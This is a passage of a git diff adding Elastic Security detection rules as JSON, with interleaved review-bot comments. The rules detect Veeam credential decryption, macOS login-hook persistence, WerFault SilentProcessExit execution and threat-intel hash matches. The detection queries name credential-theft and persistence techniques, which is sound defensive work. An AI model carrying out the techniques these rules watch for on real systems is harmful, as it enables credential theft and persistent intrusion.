true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "source.port", + "type": "long" + } + ], + "risk_score": 47, + "rule_id": "aa9a274d-6b53-424d-ac5e-cb8ca4251650", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral 
Movement", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/" + } + ] + } + ], + "type": "eql", + "version": 111 + }, + "id": "aa9a274d-6b53-424d-ac5e-cb8ca4251650_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/aaab30ec-b004-4191-95e1-4a14387ef6a6_1.json b/packages/security_detection_engine/kibana/security_rule/aaab30ec-b004-4191-95e1-4a14387ef6a6_1.json new file mode 100644 index 00000000000..28385709480 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/aaab30ec-b004-4191-95e1-4a14387ef6a6_1.json 
@@ -0,0 +1,118 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies potential credential decrypt operations by PowerShell or unsigned processes using the Veeam.Backup.Common.dll library. Attackers can use Veeam Credentials to target backups as part of destructive operations such as Ransomware attacks.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.library*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Veeam Backup Library Loaded by Unusual Process", + "query": "library where host.os.type == \"windows\" and event.action == \"load\" and\n (dll.name : \"Veeam.Backup.Common.dll\" or dll.pe.original_file_name : \"Veeam.Backup.Common.dll\") and\n (\n process.code_signature.trusted == false or\n process.code_signature.exists == false or\n process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\")\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "dll.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.exists", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "aaab30ec-b004-4191-95e1-4a14387ef6a6", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": 
"T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/" + }, + { + "id": "T1555", + "name": "Credentials from Password Stores", + "reference": "https://attack.mitre.org/techniques/T1555/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "aaab30ec-b004-4191-95e1-4a14387ef6a6_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/aaab30ec-b004-4191-95e1-4a14387ef6a6_2.json b/packages/security_detection_engine/kibana/security_rule/aaab30ec-b004-4191-95e1-4a14387ef6a6_2.json new file mode 100644 index 00000000000..e262b7d8fe3 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/aaab30ec-b004-4191-95e1-4a14387ef6a6_2.json 
@@ -0,0 +1,118 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies potential credential decrypt operations by PowerShell or unsigned processes using the Veeam.Backup.Common.dll library. Attackers can use Veeam Credentials to target backups as part of destructive operations such as Ransomware attacks.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.library-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Veeam Backup Library Loaded by Unusual Process", + "query": "library where host.os.type == \"windows\" and event.action == \"load\" and\n (dll.name : \"Veeam.Backup.Common.dll\" or dll.pe.original_file_name : \"Veeam.Backup.Common.dll\") and\n (\n process.code_signature.trusted == false or\n process.code_signature.exists == false or\n process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\")\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "dll.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.exists", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "aaab30ec-b004-4191-95e1-4a14387ef6a6", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": 
"T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/" + }, + { + "id": "T1555", + "name": "Credentials from Password Stores", + "reference": "https://attack.mitre.org/techniques/T1555/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "aaab30ec-b004-4191-95e1-4a14387ef6a6_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/aab184d3-72b3-4639-b242-6597c99d8bca_7.json b/packages/security_detection_engine/kibana/security_rule/aab184d3-72b3-4639-b242-6597c99d8bca_7.json new file mode 100644 index 00000000000..d278ace0473 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/aab184d3-72b3-4639-b242-6597c99d8bca_7.json 
@@ -0,0 +1,209 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule is triggered when a hash indicator from the Threat Intel Filebeat module or integrations has a match against an event that contains file hashes, such as antivirus alerts, process creation, library load, and file operation events.", + "from": "now-65m", + "index": [ + "auditbeat-*", + "endgame-*", + "filebeat-*", + "logs-*", + "winlogbeat-*" + ], + "interval": "1h", + "language": "kuery", + "license": "Elastic License v2", + "name": "Threat Intel Hash Indicator Match", + "note": "## Triage and Analysis\n\n### Investigating Threat Intel Hash Indicator Match\n\nThreat Intel indicator match rules allow matching from a local observation, such as an endpoint event that records a file hash with an entry of a file hash stored within the Threat Intel integrations index.\n\nMatches are based on threat intelligence data that's been ingested during the last 30 days. Some integrations don't place expiration dates on their threat indicators, so we strongly recommend validating ingested threat indicators and reviewing match results. When reviewing match results, check associated activity to determine whether the event requires additional investigation.\n\nThis rule is triggered when a hash indicator from the Threat Intel Filebeat module or an indicator ingested from a threat intelligence integration matches against an event that contains file hashes, such as antivirus alerts, file operation events, etc.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Gain context about the field that matched the local observation. 
This information can be found in the `threat.indicator.matched.field` field.\n- Investigate the hash , which can be found in the `threat.indicator.matched.atomic` field:\n - Search for the existence and reputation of the hash in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n - Scope other potentially compromised hosts in your environment by mapping hosts with file operations involving the same hash.\n- Identify the process that created the file.\n - Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Enrich the information that you have right now by determining how the file was dropped, where it was downloaded from, etc. This can help you determine if the event is part of an ongoing campaign against the organization.\n- Retrieve the involved file and examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account 
FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Using the data collected through the analysis, scope users targeted and other machines infected in the environment.\n\n### False Positive Analysis\n\n- Adversaries often use legitimate tools as network administrators, such as `PsExec` or `AdFind`. These tools are often included in indicator lists, which creates the potential for false positives.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file.hash.*:* or process.hash.*:* or dll.hash.*:*\n", + "references": [ + "https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-threatintel.html", + "https://www.elastic.co/guide/en/security/master/es-threat-intel-integrations.html", + "https://www.elastic.co/security/tip" + ], + "required_fields": [ + { + "ecs": false, + "name": "dll.hash.*", + "type": "unknown" + }, + { + "ecs": false, + "name": "file.hash.*", + "type": "unknown" + }, + { + "ecs": false, + "name": "process.hash.*", + "type": "unknown" + } + ], + "risk_score": 99, + "rule_id": "aab184d3-72b3-4639-b242-6597c99d8bca", + "setup": "## Setup\n\nThis rule needs threat intelligence indicators to work.\nThreat intelligence indicators can be collected using an [Elastic Agent integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#agent-ti-integration),\nthe [Threat Intel module](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#ti-mod-integration),\nor a [custom integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#custom-ti-integration).\n\nMore information can be found [here](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html).\n", + "severity": "critical", + "tags": [ + "OS: Windows", + "Data Source: Elastic Endgame", + "Rule Type: Indicator Match" + ], + "threat_filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "disabled": false, + "key": "event.category", + "negate": false, + "params": { + "query": "threat" + }, + "type": "phrase" + }, 
+ "query": { + "match_phrase": { + "event.category": "threat" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "disabled": false, + "key": "event.kind", + "negate": false, + "params": { + "query": "enrichment" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "enrichment" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "disabled": false, + "key": "event.type", + "negate": false, + "params": { + "query": "indicator" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.type": "indicator" + } + } + } + ], + "threat_index": [ + "filebeat-*", + "logs-ti_*" + ], + "threat_indicator_path": "threat.indicator", + "threat_language": "kuery", + "threat_mapping": [ + { + "entries": [ + { + "field": "file.hash.md5", + "type": "mapping", + "value": "threat.indicator.file.hash.md5" + } + ] + }, + { + "entries": [ + { + "field": "file.hash.sha1", + "type": "mapping", + "value": "threat.indicator.file.hash.sha1" + } + ] + }, + { + "entries": [ + { + "field": "file.hash.sha256", + "type": "mapping", + "value": "threat.indicator.file.hash.sha256" + } + ] + }, + { + "entries": [ + { + "field": "dll.hash.md5", + "type": "mapping", + "value": "threat.indicator.file.hash.md5" + } + ] + }, + { + "entries": [ + { + "field": "dll.hash.sha1", + "type": "mapping", + "value": "threat.indicator.file.hash.sha1" + } + ] + }, + { + "entries": [ + { + "field": "dll.hash.sha256", + "type": "mapping", + "value": "threat.indicator.file.hash.sha256" + } + ] + }, + { + "entries": [ + { + "field": "process.hash.md5", + "type": "mapping", + "value": "threat.indicator.file.hash.md5" + } + ] + }, + { + "entries": [ + { + "field": "process.hash.sha1", + "type": "mapping", + "value": "threat.indicator.file.hash.sha1" + } + ] + }, + { + "entries": [ + { + "field": "process.hash.sha256", + "type": "mapping", + "value": "threat.indicator.file.hash.sha256" + } + ] + } + ], + "threat_query": "@timestamp >= \"now-30d/d\" 
and event.module:(threatintel or ti_*) and (threat.indicator.file.hash.*:* or threat.indicator.file.pe.imphash:*) and not labels.is_ioc_transform_source:\"true\"", + "timeline_id": "495ad7a7-316e-4544-8a0f-9c098daee76e", + "timeline_title": "Generic Threat Match Timeline", + "timestamp_override": "event.ingested", + "type": "threat_match", + "version": 7 + }, + "id": "aab184d3-72b3-4639-b242-6597c99d8bca_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ac412404-57a5-476f-858f-4e8fbb4f48d8_107.json b/packages/security_detection_engine/kibana/security_rule/ac412404-57a5-476f-858f-4e8fbb4f48d8_107.json new file mode 100644 index 00000000000..1e9f1c090b4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ac412404-57a5-476f-858f-4e8fbb4f48d8_107.json 
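Review bot: The `tags` list carries only `OS: Windows` and `Data Source: Elastic Endgame`, but the `index` patterns (`auditbeat-*`, `filebeat-*`, `logs-*`, `winlogbeat-*`) and the hash fields in `query` are OS-agnostic and also cover Elastic Defend data, so the metadata under-describes where this rule fires. Either drop the OS tag or add the other platforms, and add `"Data Source: Elastic Defend"` alongside Endgame so tag-based filtering in Kibana does not hide the rule from Defend users. A one-line `note` sentence stating that matches are limited to indicators ingested in the last 30 days by `threat_query` (`@timestamp >= "now-30d/d"`) would also tie the triage text to the actual filter.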
@@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation or modification of the login window property list (plist). Adversaries may modify plist files to run a program during system boot or user login for persistence.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential Persistence via Login Hook", + "note": "## Triage and analysis\n\nStarting in Mac OS X 10.7 (Lion), users can specify certain applications to be re-opened when a user reboots their machine. This can be abused to establish or maintain persistence on a compromised system.", + "query": "event.category:file and host.os.type:macos and not event.type:\"deletion\" and\n file.name:\"com.apple.loginwindow.plist\" and\n process.name:(* and not (systemmigrationd or DesktopServicesHelper or diskmanagementd or rsync or launchd or cfprefsd or xpcproxy or ManagedClient or MCXCompositor or backupd or \"iMazing Profile Editor\"\n))\n", + "references": [ + "https://github.com/D00MFist/PersistentJXA/blob/master/LoginScript.js" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ac412404-57a5-476f-858f-4e8fbb4f48d8", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1647", + "name": "Plist File Modification", + "reference": "https://attack.mitre.org/techniques/T1647/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 107 + }, + "id": "ac412404-57a5-476f-858f-4e8fbb4f48d8_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_111.json b/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_111.json new file mode 100644 index 00000000000..ce89d26eb79 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_111.json 
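Review bot: `index` is the broad `logs-endpoint.events.*` while `query` is restricted to `event.category:file`; the other endpoint rules in this change narrow to per-category data streams (`logs-endpoint.events.library-*`, `logs-endpoint.events.process-*`), so `"logs-endpoint.events.file-*"` would be consistent and avoids scanning process, network and library streams for a file rule. Separately, the `note` describes application re-opening at reboot but never says what the rule watches: a non-deletion write to `com.apple.loginwindow.plist`, where the `LoginHook`/`LogoutHook` keys name a script run at login or logout. A sentence in `note` asking the analyst to inspect those keys in the modified plist and the `process.executable` and user that wrote it would make triage actionable.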
@@ -0,0 +1,145 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "A suspicious WerFault child process was detected, which may indicate an attempt to run via the SilentProcessExit registry key manipulation. Verify process details such as command line, network connections and file writes.", + "false_positives": [ + "Custom Windows error reporting debugger or applications restarted by WerFault after a crash." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious WerFault Child Process", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n\n process.parent.name : \"WerFault.exe\" and \n \n /* args -s and -t used to execute a process via SilentProcessExit mechanism */\n (process.parent.args : \"-s\" and process.parent.args : \"-t\" and process.parent.args : \"-c\") and \n \n not process.executable : (\"?:\\\\Windows\\\\SysWOW64\\\\Initcrypt.exe\", \"?:\\\\Program Files (x86)\\\\Heimdal\\\\Heimdal.Guard.exe\")\n", + "references": [ + "https://www.hexacorn.com/blog/2019/09/19/silentprocessexit-quick-look-under-the-hood/", + "https://www.hexacorn.com/blog/2019/09/20/werfault-command-line-switches-v0-1/", + "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/master/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx", + "http://web.archive.org/web/20230530011556/https://blog.menasec.net/2021/01/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, 
+ { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ac5012b8-8da8-440b-aaaf-aedafdea2dff", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.012", + "name": "Image File Execution Options Injection", + "reference": "https://attack.mitre.org/techniques/T1546/012/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": 
"https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.012", + "name": "Image File Execution Options Injection", + "reference": "https://attack.mitre.org/techniques/T1546/012/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "ac5012b8-8da8-440b-aaaf-aedafdea2dff_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_112.json b/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_112.json new file mode 100644 index 00000000000..20a8f6e5540 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_112.json 
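Review bot: The inline comment in `query`, `/* args -s and -t used to execute a process via SilentProcessExit mechanism */`, names two switches while the condition directly below requires all three of `-s`, `-t` and `-c`, so someone tuning the rule may drop `-c` as unrelated. Change it to `/* args -s, -t and -c used to execute a process via SilentProcessExit mechanism */` so the comment matches the predicate. If further benign WerFault-launched debuggers appear, extend the `process.executable` exclusion list (the `false_positives` entry already documents that category) rather than relaxing the argument check. The same comment appears unchanged in the `_112.json` copy in the next hunk.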
@@ -0,0 +1,145 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "A suspicious WerFault child process was detected, which may indicate an attempt to run via the SilentProcessExit registry key manipulation. Verify process details such as command line, network connections and file writes.", + "false_positives": [ + "Custom Windows error reporting debugger or applications restarted by WerFault after a crash." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious WerFault Child Process", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n\n process.parent.name : \"WerFault.exe\" and \n \n /* args -s and -t used to execute a process via SilentProcessExit mechanism */\n (process.parent.args : \"-s\" and process.parent.args : \"-t\" and process.parent.args : \"-c\") and \n \n not process.executable : (\"?:\\\\Windows\\\\SysWOW64\\\\Initcrypt.exe\", \"?:\\\\Program Files (x86)\\\\Heimdal\\\\Heimdal.Guard.exe\")\n", + "references": [ + "https://www.hexacorn.com/blog/2019/09/19/silentprocessexit-quick-look-under-the-hood/", + "https://www.hexacorn.com/blog/2019/09/20/werfault-command-line-switches-v0-1/", + "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/master/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx", + "http://web.archive.org/web/20230530011556/https://blog.menasec.net/2021/01/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": 
"keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ac5012b8-8da8-440b-aaaf-aedafdea2dff", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.012", + "name": "Image File Execution Options Injection", + "reference": "https://attack.mitre.org/techniques/T1546/012/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": 
